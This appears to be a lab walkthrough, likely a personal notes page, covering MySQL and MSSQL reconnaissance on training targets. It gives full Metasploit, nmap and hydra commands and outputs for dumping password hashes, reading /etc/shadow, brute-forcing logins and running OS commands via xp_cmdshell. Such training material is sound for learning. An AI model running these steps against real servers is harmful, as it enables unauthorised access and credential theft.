mysql-enum

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| books              |
| data               |
| mysql              |
| password           |
| performance_schema |
| secret             |
| store              |
| upload             |
| vendors            |
| videos             |
+--------------------+
11 rows in set (0.001 sec)

There are 11 databases on the server.

MySQL [(none)]> use books;
MySQL [books]> select count(*) from authors;
+----------+
| count(*) |
+----------+
|       10 |
+----------+
1 row in set (0.000 sec)

There are 10 records in table authors inside the books database.

Metasploit Enum

Use the mysql_schemadump metasploit module to dump the schema of all databases: https://www.rapid7.com/db/modules/auxiliary/scanner/mysql/mysql_schemadump/

Run msfconsole

msfconsole

Load module and configure

use auxiliary/scanner/mysql/mysql_schemadump
set RHOSTS 192.49.51.3
set USERNAME root
set PASSWORD ""
exploit

Example output (schema dump):

[+] 192.49.51.3:3306      - Schema stored in: /root/.msf4/loot/20230219145005_default_192.49.51.3_mysql_schema_310503.txt
[+] 192.49.51.3:3306      - MySQL Server Schema
 Host: 192.49.51.3
 Port: 3306
 ====================
---
- DBName: books
  Tables:
  - TableName: authors
    Columns:
    - ColumnName: id
      ColumnType: int(11)
    - ColumnName: first_name
      ColumnType: varchar(50)
    - ColumnName: last_name
      ColumnType: varchar(50)
    - ColumnName: email
      ColumnType: varchar(100)
    - ColumnName: birthdate
      ColumnType: date
    - ColumnName: added
      ColumnType: timestamp
- DBName: data
  Tables: []
- DBName: password
  Tables: []
- DBName: secret
  Tables: []
- DBName: store
  Tables: []
- DBName: upload
  Tables: []
- DBName: vendors
  Tables: []
- DBName: videos
  Tables: []

Use the mysql_writable_dirs metasploit module to enumerate writable directories: https://www.rapid7.com/db/modules/auxiliary/scanner/mysql/mysql_writable_dirs/

Run msfconsole

msfconsole

Load module and configure

use auxiliary/scanner/mysql/mysql_writable_dirs
set DIR_LIST /usr/share/metasploit-framework/data/wordlists/directory.txt
set RHOSTS 192.49.51.3
set VERBOSE false
set PASSWORD ""
exploit

Example output (writable dirs scan):

[!] 192.49.51.3:3306 - For every writable directory found, a file called UlxAUnoc with the text test will be written to the directory.
[*] 192.49.51.3:3306 - Login...
[*] 192.49.51.3:3306 - Checking /tmp...
[+] 192.49.51.3:3306 - /tmp is writeable
...
[*] 192.49.51.3:3306 - Checking /root...
[+] 192.49.51.3:3306 - /root is writeable
...

2 directories are writable: /tmp and /root

Use the mysql_file_enum metasploit module to enumerate readable files: https://www.rapid7.com/db/modules/auxiliary/scanner/mysql/mysql_file_enum/

Run msfconsole

msfconsole

Load module and configure

use auxiliary/scanner/mysql/mysql_file_enum
set RHOSTS 192.49.51.3
set FILE_LIST /usr/share/metasploit-framework/data/wordlists/sensitive_files.txt
set PASSWORD ""
exploit

Example output (readable files):

[+] 192.49.51.3:3306 - /etc/passwd
[+] 192.49.51.3:3306 - /etc/shadow
[+] 192.49.51.3:3306 - /etc/group
[+] 192.49.51.3:3306 - /etc/mysql/my.cn
[+] 192.49.51.3:3306 - /etc/hosts
[+] 192.49.51.3:3306 - /etc/hosts.allow
[+] 192.49.51.3:3306 - /etc/hosts.deny
[+] 192.49.51.3:3306 - /etc/issue
[+] 192.49.51.3:3306 - /etc/fstab
[+] 192.49.51.3:3306 - /proc/version

10 sensitive files are readable: /etc/passwd, /etc/shadow, /etc/group, /etc/mysql/my.cn, /etc/hosts, /etc/hosts.allow, /etc/hosts.deny, /etc/issue, /etc/fstab, /proc/version

Use the mysql_hashdump metasploit module to list database users and their password hashes: https://www.rapid7.com/db/modules/auxiliary/scanner/mysql/mysql_hashdump/

Run msfconsole

msfconsole

Load module and configure

use auxiliary/scanner/mysql/mysql_hashdump
set RHOSTS 192.49.51.3
set USERNAME root
set PASSWORD ""
exploit

Example output (hashdump):

[+] 192.49.51.3:3306 - Saving HashString as Loot: debian-sys-maint:*CDDA79A15EF590ED57BB5933ECD27364809EE90D
[+] 192.49.51.3:3306 - Saving HashString as Loot: filetest:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[+] 192.49.51.3:3306 - Saving HashString as Loot: ultra:*827EC562775DC9CE458689D36687DCED320F34B0
[+] 192.49.51.3:3306 - Saving HashString as Loot: guest:*17FD2DDCC01E0E66405FB1BA16F033188D18F646
[+] 192.49.51.3:3306 - Saving HashString as Loot: sigver:*027ADC92DD1A83351C64ABCD8BD4BA16EEDA0AB0
[+] 192.49.51.3:3306 - Saving HashString as Loot: udadmin:*E6DEAD2645D88071D28F004A209691AC60A72AC9
[+] 192.49.51.3:3306 - Saving HashString as Loot: sysadmin:*46CFC7938B60837F46B610A2D10C248874555C14

8 db users are present:

debian-sys-maint:*CDDA79A15EF590ED57BB5933ECD27364809EE90D
root:
filetest:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
ultra:*827EC562775DC9CE458689D36687DCED320F34B0
guest:*17FD2DDCC01E0E66405FB1BA16F033188D18F646
sigver:*027ADC92DD1A83351C64ABCD8BD4BA16EEDA0AB0
udadmin:*E6DEAD2645D88071D28F004A209691AC60A72AC9
sysadmin:*46CFC7938B60837F46B610A2D10C248874555C14

Example of checking file read via mysql client:

mysql -h 192.49.51.3 -u root

MySQL [(none)]> select load_file("/etc/shadow");
# /etc/shadow is readable

Reveal Flag — System password hash for user “root”

S1eBFuRRxwD7qEcUIjHxV7Rkj9OXaIGbIOiHsjPZF2uGmGBjRQ3rrQY3/6M.fWHRBHRntsKhgqnClY2.KC.vA/

Nmap Enum

Use nmap mysql-empty-password script to check MySQL with an empty password for root and anonymous users: https://nmap.org/nsedoc/scripts/mysql-empty-password.html

nmap --script=mysql-empty-password -p3306 192.49.51.3

Example output:

3306/tcp open  mysql
| mysql-empty-password:
|_  root account has empty password

root and anonymous users login is permitted without password.

Use nmap mysql-info script to check MySQL server information: https://nmap.org/nsedoc/scripts/mysql-info.html

nmap -sV -sC -p3306 192.49.51.3
# mysql-info already in the default scripts
nmap --script=mysql-info -p3306 192.49.51.3

Example output:

3306/tcp open  mysql
| mysql-info:
|   Protocol: 10
|   Version: 5.5.62-0ubuntu0.14.04.1
|   Thread ID: 57
|   Capabilities flags: 63487
|   Some Capabilities: Support41Auth, ConnectWithDatabase, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, DontAllowDatabaseTableColumn, SupportsCompression, IgnoreSigpipes, LongColumnFlag, FoundRows, InteractiveClient, ODBCClient, SupportsTransactions, Speaks41ProtocolNew, LongPassword, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: u+r!I,>5/-0I_%5y&M2P
|_  Auth Plugin Name: 96

InteractiveClient is supported on the server.

Use nmap mysql-users script to list all MySQL db users: https://nmap.org/nsedoc/scripts/mysql-users.html

nmap --script=mysql-users --script-args="mysqluser='root',mysqlpass=''" -p3306 192.49.51.3

Example output:

3306/tcp open  mysql
| mysql-users:
|   filetest
|   root
|   debian-sys-maint
|   guest
|   sigver
|   sysadmin
|   udadmin
|_  ultra

DB users are: filetest, root, debian-sys-maint, guest, sigver, sysadmin, udadmin, ultra

Use nmap mysql-databases script to list all MySQL databases: https://nmap.org/nsedoc/scripts/mysql-databases.html

nmap --script=mysql-databases --script-args="mysqluser='root',mysqlpass=''" -p3306 192.49.51.3

Example output:

3306/tcp open  mysql
| mysql-databases:
|   information_schema
|   books
|   data
|   mysql
|   password
|   performance_schema
|   secret
|   store
|   upload
|   vendors
|_  videos

MySQL databases are information_schema, books, data, mysql, password, performance_schema, secret, store, upload, vendors, videos

Use nmap mysql-variables script to show MySQL variables: https://nmap.org/nsedoc/scripts/mysql-variables.html

nmap --script=mysql-variables --script-args="mysqluser='root',mysqlpass=''" -p3306 192.49.51.3

The data directory used by MySQL server is datadir: var/lib/mysql/

Use nmap mysql-audit script to audit MySQL server security configuration: https://nmap.org/nsedoc/scripts/mysql-audit.html

nmap --script=mysql-audit --script-args="mysql-audit.username='root',mysql-audit.password='',mysql-audit.filename=''" -p3306 192.49.51.3

Example output summary:

3306/tcp open  mysql
| mysql-audit:
|   CIS MySQL Benchmarks v1.0.2
|       3.1: Skip symbolic links => FAIL
|       3.2: Logs not on system partition => PASS
|       ...
|       6.2: Disable Load data local => FAIL
|       6.3: Disable old password hashing => FAIL
|       ...
|     Additional information
|       The audit was performed using the db-account: root
|_      The following admin accounts were excluded from the audit: root,debian-sys-maint

No File privileges can be granted to non admin users.

Use nmap mysql-dump-hashes script to dump password hashes: https://nmap.org/nsedoc/scripts/mysql-dump-hashes.html

nmap --script=mysql-dump-hashes --script-args="username='root',password=''" -p3306 192.49.51.3

Example output:

3306/tcp open  mysql
| mysql-dump-hashes:
|   debian-sys-maint:*CDDA79A15EF590ED57BB5933ECD27364809EE90D
|   filetest:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
|   ultra:*827EC562775DC9CE458689D36687DCED320F34B0
|   guest:*17FD2DDCC01E0E66405FB1BA16F033188D18F646
|   sigver:*027ADC92DD1A83351C64ABCD8BD4BA16EEDA0AB0
|   udadmin:*E6DEAD2645D88071D28F004A209691AC60A72AC9
|_  sysadmin:*46CFC7938B60837F46B610A2D10C248874555C14

Users hashes are:

debian-sys-maint:*CDDA79A15EF590ED57BB5933ECD27364809EE90D
filetest:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
ultra:*827EC562775DC9CE458689D36687DCED320F34B0
guest:*17FD2DDCC01E0E66405FB1BA16F033188D18F646
sigver:*027ADC92DD1A83351C64ABCD8BD4BA16EEDA0AB0
udadmin:*E6DEAD2645D88071D28F004A209691AC60A72AC9
sysadmin:*46CFC7938B60837F46B610A2D10C248874555C14

Use nmap mysql-query script to run a query against a MySQL db: https://nmap.org/nsedoc/scripts/mysql-query.html

nmap --script=mysql-query --script-args="query='select count(*) from books.authors;',username='root',password=''" -p3306 192.49.51.3

Example output:

3306/tcp open  mysql
| mysql-query:
|   count(*)
|   10
|
|   Query: select count(*) from books.authors;
|_  User: root

Lab 2

MySQL Recon: Dictionary Attack — https://attackdefense.com/challengedetails?cid=532

Target IP: 10.4.16.17
MySQL server dictionary attack.

Example reconnaissance:

ip -br -c a
    eth1@if176858   UP   192.222.16.2/24
nmap 192.222.16.3

nmap -sV -p3306 192.222.16.3
# 3306/tcp open  mysql   MySQL 5.5.62-0ubuntu0.14.04.1

Metasploit (bruteforce)

Use the mysql_login metasploit module: https://www.rapid7.com/db/modules/auxiliary/scanner/mysql/mysql_login/

Run msfconsole

msfconsole

Load module and configure

use auxiliary/scanner/mysql/mysql_login
set RHOSTS 192.222.16.3
set USERNAME root
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set VERBOSE false
set STOP_ON_SUCCESS true
exploit

Example output:

[+] 192.222.16.3:3306     - 192.222.16.3:3306 - Success: 'root:catalina'
[*] 192.222.16.3:3306     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Reveal Flag — MySQL server "root" password is: catalina

Hydra (bruteforce)

Use hydra with the same unix_passwords list:

hydra -l root -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.222.16.3 mysql

Example output:

[3306][mysql] host: 192.222.16.3   login: root   password: catalina
1 of 1 target successfully completed, 1 valid password found

Lab 3 - nmap (MSSQL)

Recon: MSSQL: Nmap Scripts — https://attackdefense.com/challengedetails?cid=2313

Target IP: 10.4.21.27
Windows MSSQL server enumeration with nmap

Basic host scan:

nmap 10.4.21.27
# 135/tcp  open  msrpc
# 139/tcp  open  netbios-ssn
# 445/tcp  open  microsoft-ds
# 1433/tcp open  ms-sql-s
# 3389/tcp open  ms-wbt-server

Service scripts:

nmap -sV -sC -p1433 10.4.21.27

Example output:

1433/tcp open  ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
|   Target_Name: MSSQL-SERVER
|   NetBIOS_Domain_Name: MSSQL-SERVER
|   NetBIOS_Computer_Name: MSSQL-SERVER
|   DNS_Domain_Name: MSSQL-Server
|   DNS_Computer_Name: MSSQL-Server
|_  Product_Version: 10.0.14393
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-02-19T17:36:09
|_Not valid after:  2053-02-19T17:36:09

Use nmap --script ms-sql-info -p1433 10.4.21.27 and nmap --script ms-sql-ntlm-info --script-args mssql.instance-port=1433 -p1433 10.4.21.27 as needed.

Server is Microsoft SQL Server 2019

Enumerate MSSQL users and passwords with ms-sql-brute:

nmap --script ms-sql-brute --script-args userdb=/root/Desktop/wordlist/common_users.txt,passdb=/root/Desktop/wordlist/100-common-passwords.txt -p1433 10.4.21.27

Example output:

1433/tcp open  ms-sql-s
| ms-sql-brute:
|   [10.4.21.27:1433]
|     Credentials found:
|       dbadmin:bubbles1 => Login Success
|       admin:anamaria => Login Success
|_      auditor:jasmine1 => Login Success

Valid MSSQL users and passwords:

dbadmin:bubbles1
admin:anamaria
auditor:jasmine1

Check empty password users:

nmap --script ms-sql-empty-password -p1433 10.4.21.27

sa user is enabled with empty password.

Extract syslogins:

nmap --script ms-sql-query --script-args mssql.username=admin,mssql.password=anamaria,ms-sql-query.query="SELECT * FROM master..syslogins" -p1433 10.4.21.27 -oN output.txt

Dump MSSQL user hashes:

nmap --script ms-sql-dump-hashes --script-args mssql.username=admin,mssql.password=anamaria -p1433 10.4.21.27

Example hashes (summary):

sa:0x020011db...
admin:0x02003814edd67d...
auditor:0x020061cbe8509d...
dbadmin:0x02000d6c6a0d55f5...
...

Execute a command using ms-sql-xp-cmdshell (spawns a Windows command shell): https://nmap.org/nsedoc/scripts/ms-sql-xp-cmdshell.html

nmap --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=anamaria,ms-sql-xp-cmdshell.cmd="ipconfig" -p1433 10.4.21.27

nmap --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=anamaria,ms-sql-xp-cmdshell.cmd="type c:\flag.txt" -p1433 10.4.21.27
# MSSQL service is configured with xp_cmdshell enabled (not by default)

Reveal Flag:

1d1803570245aa620446518b2154f324

Lab 4 - Metasploit (MSSQL)

Recon: MSSQL: Metasploit — https://attackdefense.com/challengedetails?cid=2314

Target IP: 10.4.23.176
Windows MSSQL server enumeration with metasploit

Initial nmap scan:

nmap 10.4.23.176
# Ports: 53, 88, 135, 139, 389, 445, 464, 593, 636, 1433, 3268, 3269, 3389

Service info:

nmap --script ms-sql-info -p1433 10.4.23.176

Server is Microsoft SQL Server 2019

Use Metasploit to brute-force MSSQL logins:

Run msfconsole

msfconsole -q

Load module and configure

use auxiliary/scanner/mssql/mssql_login
set RHOSTS 10.4.23.176
set USER_FILE /root/Desktop/wordlist/common_users.txt
set PASS_FILE /root/Desktop/wordlist/100-common-passwords.txt
set VERBOSE false
exploit

Example output:

[*] 10.4.23.176:1433      - 10.4.23.176:1433 - MSSQL - Starting authentication scanner.
[+] 10.4.23.176:1433      - 10.4.23.176:1433 - Login Successful: WORKSTATION\sa:
[+] 10.4.23.176:1433      - 10.4.23.176:1433 - Login Successful: WORKSTATION\dbadmin:anamaria
[+] 10.4.23.176:1433      - 10.4.23.176:1433 - Login Successful: WORKSTATION\auditor:nikita

sa user has empty password.

Other users and passwords:

dbadmin:anamaria
auditor:nikita

Enumerate MSSQL configuration, logins and users:

use auxiliary/admin/mssql/mssql_enum
set RHOSTS 10.4.23.176
exploit

use auxiliary/admin/mssql/mssql_enum_sql_logins
set RHOSTS 10.4.23.176
exploit

Example output (enumeration):

[*] 10.4.23.176:1433 - Attempting to connect to the database server at 10.4.23.176:1433 as sa...
[+] 10.4.23.176:1433 - Connected.
[*] 10.4.23.176:1433 - Checking if sa has the sysadmin role...
[+] 10.4.23.176:1433 - sa is a sysadmin.
...
[+] 10.4.23.176:1433 - 16 SQL Server logins were verified:
- ##MS_PolicyEventProcessingLogin##
- ##MS_PolicyTsqlExecutionLogin##
- ...
- admin
- auditor
- dbadmin
- sa

Execute commands via metasploit module:

use auxiliary/admin/mssql/mssql_exec
set RHOSTS 10.4.23.176
set CMD whoami
exploit

Example output:

[*] Running module against 10.4.23.176
[*] 10.4.23.176:1433 - SQL Query: EXEC master..xp_cmdshell 'whoami'
 output
 ------
 nt service\mssql$sqlexpress
[*] Auxiliary module execution completed

Enumerate domain accounts:

use auxiliary/admin/mssql/mssql_enum_domain_accounts
set RHOSTS 10.4.23.176
exploit

Last updated 3 hours ago

Previoushttp-enum NextPorts

Last updated 3 months ago

hashtagMetasploit Enum

hashtagRun msfconsole

hashtagLoad module and configure

hashtagRun msfconsole

hashtagLoad module and configure

hashtagRun msfconsole

hashtagLoad module and configure

hashtagRun msfconsole

hashtagLoad module and configure

hashtagNmap Enum

hashtagLab 2

hashtagMetasploit (bruteforce)

hashtagRun msfconsole

hashtagLoad module and configure

hashtagHydra (bruteforce)

hashtagLab 3 - nmap (MSSQL)

hashtagLab 4 - Metasploit (MSSQL)

hashtagRun msfconsole

hashtagLoad module and configure

Metasploit Enum

Run msfconsole

Load module and configure

Run msfconsole

Load module and configure

Run msfconsole

Load module and configure

Run msfconsole

Load module and configure

Nmap Enum

Lab 2

Metasploit (bruteforce)

Run msfconsole

Load module and configure

Hydra (bruteforce)

Lab 3 - nmap (MSSQL)

Lab 4 - Metasploit (MSSQL)

Run msfconsole

Load module and configure